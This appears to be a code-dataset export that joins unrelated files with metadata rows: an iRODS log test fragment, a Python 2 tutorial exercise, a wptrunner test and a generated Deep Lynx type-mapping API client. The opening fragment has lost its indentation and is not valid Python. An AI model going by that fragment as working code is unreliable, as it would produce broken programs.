initial_log_size = lib.get_log_size('server')
# invoke irule to trigger PEP
sesh.assert_icommand('irule -F {rule_file}'.format(**locals()))
# confirm that PEP was hit by looking for pep name in server log
assert lib.count_occurrences_of_string_in_log('server', pep_name, start_index=initial_log_size)
# check that resource session vars were written to the server log
for line in resource_property_list:
column = line.rsplit('=', 1)[0].strip()
property = line.rsplit('=', 1)[1].strip()
if property:
if column != 'RESC_MODIFY_TIME':
assert lib.count_occurrences_of_string_in_log('server', property, start_index=initial_log_size)
# cleanup
sesh.run_icommand('irm -f {target_obj}'.format(**locals()))
os.unlink(rule_file)
os.unlink(test_re)
| 45.066212
| 138
| 0.568157
| 4,864
| 46,283
| 5.173314
| 0.066406
| 0.100147
| 0.125184
| 0.01987
| 0.897747
| 0.883957
| 0.873425
| 0.873425
| 0.867504
| 0.866113
| 0
| 0.008157
| 0.319253
| 46,283
| 1,026
| 139
| 45.110136
| 0.790491
| 0.124538
| 0
| 0.82311
| 0
| 0
| 0.351794
| 0.141798
| 0
| 0
| 0
| 0
| 0.0699
| 1
| 0.022825
| false
| 0
| 0.017118
| 0
| 0.041369
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
729882cc7fa8fff88babb42e9b911eb74a994fff
| 1,813
|
py
|
Python
|
lpthw/ex33.py
|
jaredmanning/learning
|
1d1767ea78a8f9f72275b18147d47bfc44a1696e
|
[
"MIT"
] | null | null | null |
lpthw/ex33.py
|
jaredmanning/learning
|
1d1767ea78a8f9f72275b18147d47bfc44a1696e
|
[
"MIT"
] | null | null | null |
lpthw/ex33.py
|
jaredmanning/learning
|
1d1767ea78a8f9f72275b18147d47bfc44a1696e
|
[
"MIT"
] | null | null | null |
#i = 0
#numbers = []
#
#while i < 6:
# print "At the top i is %d" % i
# numbers.append(i)
#
# i += 1
# print "Numbers now: ", numbers
# print "At the bottom i is %d" % i
#
#
#print "The numbers: "
#
#for num in numbers:
# print num
#Study Drill Part 1
#print "What's the limit of the list?"
#a = int(raw_input("> "))
#
#def list_numbers(a):
# """This function might add numbers to a list?"""
# i = 0
# numbers = []
#
# while i < a:
# print "At the top i is %d" % i
# numbers.append(i)
#
# i += 1
# print "Numbers now: ", numbers
# print "At the bottom i is %d" % i
#
# print "The numbers: "
#
# for num in numbers:
# print num
#
# return
#
#list_numbers(a)
#Study Drill Part 2
#print "What's the limit of the list?"
#a = int(raw_input("> "))
#
#print "What is the desired increment?"
#n = int(raw_input("> "))
#
#def list_numbers():
# """This function might add numbers to a list?"""
# i = 0
# numbers = []
#
# while i < a:
# print "At the top i is %d" % i
# numbers.append(i)
#
# i += n
# print "Numbers now: ", numbers
# print "At the bottom i is %d" % i
#
# print "The numbers: "
#
# for num in numbers:
# print num
#
# return
#
#list_numbers()
#Study Drill Part 3
print "What's the limit of the list?"
a = int(raw_input("> "))
print "What is the desired increment?"
n = int(raw_input("> "))
def list_numbers():
"""This function adds numbers to a list"""
i = 0
numbers = []
for i in range(0, a, n):
print "At the top i is %d" % i
numbers.append(i)
print "Numbers now: ", numbers
print "At the bottom i is %d" % i
print "The numbers: "
for num in numbers:
print num
return
list_numbers()
| 18.13
| 53
| 0.539989
| 273
| 1,813
| 3.545788
| 0.161172
| 0.057851
| 0.082645
| 0.041322
| 0.930785
| 0.915289
| 0.900826
| 0.877066
| 0.877066
| 0.877066
| 0
| 0.008793
| 0.309983
| 1,813
| 99
| 54
| 18.313131
| 0.764988
| 0.646442
| 0
| 0
| 0
| 0
| 0.241966
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.411765
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
72cff21016a8e51036bb99e46b27cb70bbf044b9
| 436
|
py
|
Python
|
tools/wptrunner/wptrunner/tests/test_stability.py
|
mtrzos/wpt
|
6e559a60ecfa38ad6cc434911dd0995a63900db6
|
[
"BSD-3-Clause"
] | null | null | null |
tools/wptrunner/wptrunner/tests/test_stability.py
|
mtrzos/wpt
|
6e559a60ecfa38ad6cc434911dd0995a63900db6
|
[
"BSD-3-Clause"
] | 1
|
2021-12-13T19:49:45.000Z
|
2021-12-13T19:49:45.000Z
|
tools/wptrunner/wptrunner/tests/test_stability.py
|
mtrzos/wpt
|
6e559a60ecfa38ad6cc434911dd0995a63900db6
|
[
"BSD-3-Clause"
] | null | null | null |
import sys
from os.path import dirname, join
sys.path.insert(0, join(dirname(__file__), "..", ".."))
from wptrunner import stability
def test_is_inconsistent():
assert stability.is_inconsistent({"PASS": 10}, 10) is False
assert stability.is_inconsistent({"PASS": 9}, 10) is True
assert stability.is_inconsistent({"PASS": 9, "FAIL": 1}, 10) is True
assert stability.is_inconsistent({"PASS": 8, "FAIL": 1}, 10) is True
| 33.538462
| 72
| 0.697248
| 63
| 436
| 4.666667
| 0.396825
| 0.238095
| 0.231293
| 0.394558
| 0.571429
| 0.397959
| 0.278912
| 0.278912
| 0
| 0
| 0
| 0.043011
| 0.146789
| 436
| 12
| 73
| 36.333333
| 0.747312
| 0
| 0
| 0
| 0
| 0
| 0.06422
| 0
| 0
| 0
| 0
| 0
| 0.444444
| 1
| 0.111111
| true
| 0.444444
| 0.333333
| 0
| 0.444444
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 7
|
72ee7eff30903c2e66eb4a676b8d1d7d779424fb
| 58,004
|
py
|
Python
|
swagger_client/api/data_type_mappings_api.py
|
idaholab/Deep-Lynx-Python-Package
|
99927cc877eba8e2ee396feec807da1c48c64893
|
[
"MIT"
] | 3
|
2021-06-16T20:34:41.000Z
|
2021-06-16T23:54:36.000Z
|
swagger_client/api/data_type_mappings_api.py
|
idaholab/Deep-Lynx-Python-Package
|
99927cc877eba8e2ee396feec807da1c48c64893
|
[
"MIT"
] | null | null | null |
swagger_client/api/data_type_mappings_api.py
|
idaholab/Deep-Lynx-Python-Package
|
99927cc877eba8e2ee396feec807da1c48c64893
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
Deep Lynx
The construction of megaprojects has consistently demonstrated challenges for project managers in regard to meeting cost, schedule, and performance requirements. Megaproject construction challenges are common place within megaprojects with many active projects in the United States failing to meet cost and schedule efforts by significant margins. Currently, engineering teams operate in siloed tools and disparate teams where connections across design, procurement, and construction systems are translated manually or over brittle point-to-point integrations. The manual nature of data exchange increases the risk of silent errors in the reactor design, with each silent error cascading across the design. These cascading errors lead to uncontrollable risk during construction, resulting in significant delays and cost overruns. Deep Lynx allows for an integrated platform during design and operations of mega projects. The Deep Lynx Core API delivers a few main features. 1. Provides a set of methods and endpoints for manipulating data in an object oriented database. This allows us to store complex datatypes as records and then to compile them into actual, modifiable objects at run-time. Users can store taxonomies or ontologies in a readable format. 2. Provides methods for storing and retrieving data in a graph database. This data is structured and validated against the aformentioned object oriented database before storage. # noqa: E501
OpenAPI spec version: 1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from swagger_client.api_client import ApiClient
class DataTypeMappingsApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_transformation(self, body, container_id, data_source_id, mapping_id, **kwargs): # noqa: E501
"""CreateTransformation # noqa: E501
Create a transformation for the type mapping. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_transformation(body, container_id, data_source_id, mapping_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param CreateTypeMappingTransformationsRequest body: (required)
:param str container_id: (required)
:param str data_source_id: (required)
:param str mapping_id: (required)
:return: CreateTransformationResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_transformation_with_http_info(body, container_id, data_source_id, mapping_id, **kwargs) # noqa: E501
else:
(data) = self.create_transformation_with_http_info(body, container_id, data_source_id, mapping_id, **kwargs) # noqa: E501
return data
def create_transformation_with_http_info(self, body, container_id, data_source_id, mapping_id, **kwargs): # noqa: E501
"""CreateTransformation # noqa: E501
Create a transformation for the type mapping. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_transformation_with_http_info(body, container_id, data_source_id, mapping_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param CreateTypeMappingTransformationsRequest body: (required)
:param str container_id: (required)
:param str data_source_id: (required)
:param str mapping_id: (required)
:return: CreateTransformationResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'container_id', 'data_source_id', 'mapping_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_transformation" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_transformation`") # noqa: E501
# verify the required parameter 'container_id' is set
if ('container_id' not in params or
params['container_id'] is None):
raise ValueError("Missing the required parameter `container_id` when calling `create_transformation`") # noqa: E501
# verify the required parameter 'data_source_id' is set
if ('data_source_id' not in params or
params['data_source_id'] is None):
raise ValueError("Missing the required parameter `data_source_id` when calling `create_transformation`") # noqa: E501
# verify the required parameter 'mapping_id' is set
if ('mapping_id' not in params or
params['mapping_id'] is None):
raise ValueError("Missing the required parameter `mapping_id` when calling `create_transformation`") # noqa: E501
collection_formats = {}
path_params = {}
if 'container_id' in params:
path_params['container_id'] = params['container_id'] # noqa: E501
if 'data_source_id' in params:
path_params['data_source_id'] = params['data_source_id'] # noqa: E501
if 'mapping_id' in params:
path_params['mapping_id'] = params['mapping_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['httpBearer'] # noqa: E501
return self.api_client.call_api(
'/containers/{container_id}/import/datasources/{data_source_id}/mappings/{mapping_id}/transformations', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreateTransformationResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_data_type_mapping(self, container_id, data_source_id, mapping_id, **kwargs): # noqa: E501
"""DeleteDataTypeMapping # noqa: E501
Permanently remove data type mapping. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_data_type_mapping(container_id, data_source_id, mapping_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str container_id: (required)
:param str data_source_id: (required)
:param str mapping_id: (required)
:return: Generic200Response
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_data_type_mapping_with_http_info(container_id, data_source_id, mapping_id, **kwargs) # noqa: E501
else:
(data) = self.delete_data_type_mapping_with_http_info(container_id, data_source_id, mapping_id, **kwargs) # noqa: E501
return data
def delete_data_type_mapping_with_http_info(self, container_id, data_source_id, mapping_id, **kwargs): # noqa: E501
"""DeleteDataTypeMapping # noqa: E501
Permanently remove data type mapping. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_data_type_mapping_with_http_info(container_id, data_source_id, mapping_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str container_id: (required)
:param str data_source_id: (required)
:param str mapping_id: (required)
:return: Generic200Response
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['container_id', 'data_source_id', 'mapping_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_data_type_mapping" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'container_id' is set
if ('container_id' not in params or
params['container_id'] is None):
raise ValueError("Missing the required parameter `container_id` when calling `delete_data_type_mapping`") # noqa: E501
# verify the required parameter 'data_source_id' is set
if ('data_source_id' not in params or
params['data_source_id'] is None):
raise ValueError("Missing the required parameter `data_source_id` when calling `delete_data_type_mapping`") # noqa: E501
# verify the required parameter 'mapping_id' is set
if ('mapping_id' not in params or
params['mapping_id'] is None):
raise ValueError("Missing the required parameter `mapping_id` when calling `delete_data_type_mapping`") # noqa: E501
collection_formats = {}
path_params = {}
if 'container_id' in params:
path_params['container_id'] = params['container_id'] # noqa: E501
if 'data_source_id' in params:
path_params['data_source_id'] = params['data_source_id'] # noqa: E501
if 'mapping_id' in params:
path_params['mapping_id'] = params['mapping_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['httpBearer'] # noqa: E501
return self.api_client.call_api(
'/containers/{container_id}/import/datasources/{data_source_id}/mappings/{mapping_id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Generic200Response', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_transformation(self, container_id, data_source_id, mapping_id, transformation_id, **kwargs): # noqa: E501
"""DeleteTransformation # noqa: E501
Delete a transformation. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_transformation(container_id, data_source_id, mapping_id, transformation_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str container_id: (required)
:param str data_source_id: (required)
:param str mapping_id: (required)
:param str transformation_id: (required)
:return: Generic200Response
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_transformation_with_http_info(container_id, data_source_id, mapping_id, transformation_id, **kwargs) # noqa: E501
else:
(data) = self.delete_transformation_with_http_info(container_id, data_source_id, mapping_id, transformation_id, **kwargs) # noqa: E501
return data
def delete_transformation_with_http_info(self, container_id, data_source_id, mapping_id, transformation_id, **kwargs): # noqa: E501
"""DeleteTransformation # noqa: E501
Delete a transformation. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_transformation_with_http_info(container_id, data_source_id, mapping_id, transformation_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str container_id: (required)
:param str data_source_id: (required)
:param str mapping_id: (required)
:param str transformation_id: (required)
:return: Generic200Response
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['container_id', 'data_source_id', 'mapping_id', 'transformation_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_transformation" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'container_id' is set
if ('container_id' not in params or
params['container_id'] is None):
raise ValueError("Missing the required parameter `container_id` when calling `delete_transformation`") # noqa: E501
# verify the required parameter 'data_source_id' is set
if ('data_source_id' not in params or
params['data_source_id'] is None):
raise ValueError("Missing the required parameter `data_source_id` when calling `delete_transformation`") # noqa: E501
# verify the required parameter 'mapping_id' is set
if ('mapping_id' not in params or
params['mapping_id'] is None):
raise ValueError("Missing the required parameter `mapping_id` when calling `delete_transformation`") # noqa: E501
# verify the required parameter 'transformation_id' is set
if ('transformation_id' not in params or
params['transformation_id'] is None):
raise ValueError("Missing the required parameter `transformation_id` when calling `delete_transformation`") # noqa: E501
collection_formats = {}
path_params = {}
if 'container_id' in params:
path_params['container_id'] = params['container_id'] # noqa: E501
if 'data_source_id' in params:
path_params['data_source_id'] = params['data_source_id'] # noqa: E501
if 'mapping_id' in params:
path_params['mapping_id'] = params['mapping_id'] # noqa: E501
if 'transformation_id' in params:
path_params['transformation_id'] = params['transformation_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['httpBearer'] # noqa: E501
return self.api_client.call_api(
'/containers/{container_id}/import/datasources/{data_source_id}/mappings/{mapping_id}/transformations/{transformation_id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Generic200Response', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def export_type_mappings(self, container_id, data_source_id, **kwargs): # noqa: E501
"""ExportTypeMappings # noqa: E501
Export type mappings for a datasource. Providing a JSON body is optional. If provided, the mapping_ids may be specified to indicate certain type mapping IDs to return. Additionally, a target data source may be provided to which the mappings will be copied. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.export_type_mappings(container_id, data_source_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str container_id: (required)
:param str data_source_id: (required)
:param TypeMappingExportPayload body:
:return: list[TypeMapping]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.export_type_mappings_with_http_info(container_id, data_source_id, **kwargs) # noqa: E501
else:
(data) = self.export_type_mappings_with_http_info(container_id, data_source_id, **kwargs) # noqa: E501
return data
def export_type_mappings_with_http_info(self, container_id, data_source_id, **kwargs): # noqa: E501
"""ExportTypeMappings # noqa: E501
Export type mappings for a datasource. Providing a JSON body is optional. If provided, the mapping_ids may be specified to indicate certain type mapping IDs to return. Additionally, a target data source may be provided to which the mappings will be copied. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.export_type_mappings_with_http_info(container_id, data_source_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str container_id: (required)
:param str data_source_id: (required)
:param TypeMappingExportPayload body:
:return: list[TypeMapping]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['container_id', 'data_source_id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method export_type_mappings" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'container_id' is set
if ('container_id' not in params or
params['container_id'] is None):
raise ValueError("Missing the required parameter `container_id` when calling `export_type_mappings`") # noqa: E501
# verify the required parameter 'data_source_id' is set
if ('data_source_id' not in params or
params['data_source_id'] is None):
raise ValueError("Missing the required parameter `data_source_id` when calling `export_type_mappings`") # noqa: E501
collection_formats = {}
path_params = {}
if 'container_id' in params:
path_params['container_id'] = params['container_id'] # noqa: E501
if 'data_source_id' in params:
path_params['data_source_id'] = params['data_source_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['httpBearer'] # noqa: E501
return self.api_client.call_api(
'/containers/{container_id}/import/datasources/{data_source_id}/mappings/export', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[TypeMapping]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def import_data_type_mappings(self, container_id, data_source_id, **kwargs): # noqa: E501
"""ImportDataTypeMappings # noqa: E501
Import type mappings for a datasource. Accepts either a JSON body or actual JSON file. The payload should be an array of type mapping classes, previously generated using the export route. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.import_data_type_mappings(container_id, data_source_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str container_id: (required)
:param str data_source_id: (required)
:param str file:
:return: list[GetDataTypeMappingResponse]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.import_data_type_mappings_with_http_info(container_id, data_source_id, **kwargs) # noqa: E501
else:
(data) = self.import_data_type_mappings_with_http_info(container_id, data_source_id, **kwargs) # noqa: E501
return data
def import_data_type_mappings_with_http_info(self, container_id, data_source_id, **kwargs): # noqa: E501
"""ImportDataTypeMappings # noqa: E501
Import type mappings for a datasource. Accepts either a JSON body or actual JSON file. The payload should be an array of type mapping classes, previously generated using the export route. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.import_data_type_mappings_with_http_info(container_id, data_source_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str container_id: (required)
:param str data_source_id: (required)
:param str file:
:return: list[GetDataTypeMappingResponse]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['container_id', 'data_source_id', 'file'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method import_data_type_mappings" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'container_id' is set
if ('container_id' not in params or
params['container_id'] is None):
raise ValueError("Missing the required parameter `container_id` when calling `import_data_type_mappings`") # noqa: E501
# verify the required parameter 'data_source_id' is set
if ('data_source_id' not in params or
params['data_source_id'] is None):
raise ValueError("Missing the required parameter `data_source_id` when calling `import_data_type_mappings`") # noqa: E501
collection_formats = {}
path_params = {}
if 'container_id' in params:
path_params['container_id'] = params['container_id'] # noqa: E501
if 'data_source_id' in params:
path_params['data_source_id'] = params['data_source_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'file' in params:
form_params.append(('file', params['file'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['httpBearer'] # noqa: E501
return self.api_client.call_api(
'/containers/{container_id}/import/datasources/{data_source_id}/mappings/import', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[GetDataTypeMappingResponse]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_data_type_mappings(self, container_id, data_source_id, **kwargs): # noqa: E501
"""ListDataTypeMappings # noqa: E501
Lists data type mappings for the data source # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_data_type_mappings(container_id, data_source_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str container_id: (required)
:param str data_source_id: (required)
:param int limit:
:param int offset:
:param bool needs_transformations: boolean indicating if the return should consist of only mappings that need transformations
:param bool count: boolean indicating if the return value should be a count only
:param str sort_by: column to sort results by
:param bool sort_desc: boolean indicating if results should be in descending order
:param str resulting_metatype_name: if supplied, filters returned transformations by those that produce the resulting metatype
:param str resulting_metatype_relationship_name: if supplied, filters returned transformations by those that produce the resulting metatype relationship
:return: ListDataTypeMappingResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_data_type_mappings_with_http_info(container_id, data_source_id, **kwargs) # noqa: E501
else:
(data) = self.list_data_type_mappings_with_http_info(container_id, data_source_id, **kwargs) # noqa: E501
return data
def list_data_type_mappings_with_http_info(self, container_id, data_source_id, **kwargs): # noqa: E501
"""ListDataTypeMappings # noqa: E501
Lists data type mappings for the data source # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_data_type_mappings_with_http_info(container_id, data_source_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str container_id: (required)
:param str data_source_id: (required)
:param int limit:
:param int offset:
:param bool needs_transformations: boolean indicating if the return should consist of only mappings that need transformations
:param bool count: boolean indicating if the return value should be a count only
:param str sort_by: column to sort results by
:param bool sort_desc: boolean indicating if results should be in descending order
:param str resulting_metatype_name: if supplied, filters returned transformations by those that produce the resulting metatype
:param str resulting_metatype_relationship_name: if supplied, filters returned transformations by those that produce the resulting metatype relationship
:return: ListDataTypeMappingResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['container_id', 'data_source_id', 'limit', 'offset', 'needs_transformations', 'count', 'sort_by', 'sort_desc', 'resulting_metatype_name', 'resulting_metatype_relationship_name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_data_type_mappings" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'container_id' is set
if ('container_id' not in params or
params['container_id'] is None):
raise ValueError("Missing the required parameter `container_id` when calling `list_data_type_mappings`") # noqa: E501
# verify the required parameter 'data_source_id' is set
if ('data_source_id' not in params or
params['data_source_id'] is None):
raise ValueError("Missing the required parameter `data_source_id` when calling `list_data_type_mappings`") # noqa: E501
collection_formats = {}
path_params = {}
if 'container_id' in params:
path_params['container_id'] = params['container_id'] # noqa: E501
if 'data_source_id' in params:
path_params['data_source_id'] = params['data_source_id'] # noqa: E501
query_params = []
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'needs_transformations' in params:
query_params.append(('needsTransformations', params['needs_transformations'])) # noqa: E501
if 'count' in params:
query_params.append(('count', params['count'])) # noqa: E501
if 'sort_by' in params:
query_params.append(('sortBy', params['sort_by'])) # noqa: E501
if 'sort_desc' in params:
query_params.append(('sortDesc', params['sort_desc'])) # noqa: E501
if 'resulting_metatype_name' in params:
query_params.append(('resultingMetatypeName', params['resulting_metatype_name'])) # noqa: E501
if 'resulting_metatype_relationship_name' in params:
query_params.append(('resultingMetatypeRelationshipName', params['resulting_metatype_relationship_name'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['httpBearer'] # noqa: E501
return self.api_client.call_api(
'/containers/{container_id}/import/datasources/{data_source_id}/mappings', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ListDataTypeMappingResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_transformations(self, container_id, data_source_id, mapping_id, **kwargs): # noqa: E501
"""ListTransformations # noqa: E501
List transformations for a type mapping from storage. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_transformations(container_id, data_source_id, mapping_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str container_id: (required)
:param str data_source_id: (required)
:param str mapping_id: (required)
:return: ListTransformationResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_transformations_with_http_info(container_id, data_source_id, mapping_id, **kwargs) # noqa: E501
else:
(data) = self.list_transformations_with_http_info(container_id, data_source_id, mapping_id, **kwargs) # noqa: E501
return data
